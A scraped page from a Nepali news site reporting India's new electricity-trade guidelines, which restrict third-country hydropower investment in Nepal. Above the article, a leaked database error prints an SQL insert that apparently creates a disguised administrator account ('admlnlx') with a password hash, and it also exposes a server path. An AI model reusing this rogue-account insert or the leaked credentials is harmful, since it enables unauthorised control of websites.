WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWAVw3uVR59Hlk6hO5sv0nD/KlVg.N/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 01:09:27', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
भारतले भन्यो-नेपालमा तेस्रो मुलुकलाई विद्युत उत्पादनमा रोक – Gaule Khabar

भारतले भन्यो-नेपालमा तेस्रो मुलुकलाई विद्युत उत्पादनमा रोक

भारतले भन्यो-नेपालमा तेस्रो मुलुकलाई विद्युत उत्पादनमा रोक

काठमाडौं, मंसिर २३–

नेपालमा तेस्रो मुलुकका जलविद्युत लगानीकर्तालाई रोक लगाउने गरी भारतले अन्तरदेशीय विद्युत व्यापार निर्देशिका बनाएको छ। भारतीय उर्जा मन्त्रालयले सोमबार उक्त निर्देशिका जारी गरेको आजको नागरिक दैनिकमा खबर छापिएको छ।
निर्देशिकामा अन्य देशमा उत्पादन भएको बिजुली भारतले आयात गर्न सरकार वा भारतीय सरकारी कम्पनी वा त्यहीका निजी कम्पनीको ५१ प्रतिशत वा सो भन्दा बढी लगानी हुनुपर्ने उल्लेख छ। भारतमा विजुली बेच्न इच्छुक देशका ‘लाइसेन्स होल्डर’ कम्पनीमा समेत भारतका विद्युत व्यापार कम्पनीको ५१ प्रतिशत वा सोभन्दा बढी स्वामित्व भएको हुनुपर्छ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका